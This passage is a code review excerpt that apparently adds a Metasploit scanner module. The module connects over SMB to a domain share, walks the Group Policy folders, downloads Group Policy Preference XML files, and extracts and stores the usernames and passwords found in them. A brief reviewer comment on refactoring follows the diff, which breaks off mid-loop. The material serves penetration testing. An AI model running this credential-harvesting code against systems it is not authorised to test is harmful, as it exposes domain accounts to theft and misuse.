modules/auxiliary/scanner/smb/smb_enum_gpp.rb

```diff
@@ -0,0 +1,216 @@
+        credential_data = {
+            origin_type: :service,
+            module_fullname: fullname,
+            username: user,
+            private_data: password,
+            private_type: :password,
+            realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+            realm_value: domain,
+        }
+    else
+        credential_data = {
+            origin_type: :service,
+            module_fullname: fullname,
+            username: new_user,
+            private_data: password,
+            private_type: :password
+        }
+    end
+    credential_core = create_credential(credential_data.merge(service_data))
+
+    login_data = {
+      core: credential_core,
+      access_level: "User",
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    create_credential_login(login_data.merge(service_data))
+  end
+
+  def parse_xml(ip,path,xmlfile)
+    mxml = xmlfile[:xml]
+    print_status "Parsing file: \\\\#{ip}\\#{datastore['SMBSHARE']}\\#{path}"
+    filetype = File.basename(xmlfile[:path].gsub("\\","/"))
+    results = Rex::Parser::GPP.parse(mxml)
+    tables = Rex::Parser::GPP.create_tables(results, filetype, xmlfile[:domain], xmlfile[:dc])
+    tables.each do |table|
+      print_good table.to_s
+    end
+    results.each do |result|
+      if datastore['STORE']
+          stored_path = store_loot('windows.gpp.xml', 'text/plain',ip, xmlfile[:xml], filetype, xmlfile[:path])
+          print_status("XML file saved to: #{stored_path}")
+      end
+
+      report_creds(ip,result[:USER], result[:PASS], result[:DISABLED])
+    end
+
+  end
+
+  def smb_download(ip,path)
+    vprint_status("Downloading #{path}...")
+    data = ''
+    begin
+      fd = simple.open("\\#{path}", 'ro')
+      data = fd.read
+      fd.close
+    end
+    spath = path.split('\\')
+    retobj = {
+        :dc     => ip,
+        :path   => path,
+        :xml    => data
+      }
+    retobj[:domain] = spath[1]
+
+    parse_xml(ip,path,retobj) if retobj
+
+    fname = path.split("\\")[-1]
+    if datastore['STORE']
+        path = store_loot("smb.shares.file", "application/octet-stream",ip, data, fname)
+        print_good("#{fname} saved as: #{path}")
+    end
+  end
+
+  def run_host(ip)
+    print_status("Connecting to the server...")
+    begin
+      connect()
+      smb_login()
+      print_status("Mounting the remote share \\\\#{ip}\\#{datastore['SMBSHARE']}'...")
+      self.simple.connect("\\\\#{ip}\\#{datastore['SMBSHARE']}")
+
+      root_listing = self.simple.client.find_first("*")
+      corpdomain = ''
+      root_listing.each_pair do |key,val|
+        next if key == '.' or key == '..'
+        corpdomain = key
+      end
+
+      subfolder_listing = self.simple.client.find_first("#{corpdomain}\\Policies\\*")
+      subfolders = []
+      subfolder_listing.each_pair do |key,val|
+        next if key == '.' or  key == '..'
+        subfolders << key
+      end
+
+      subfolders.each do |i|
```

Comment:
Maybe create an array and iterate vs calling the function repeatedly with an explicit list of paths?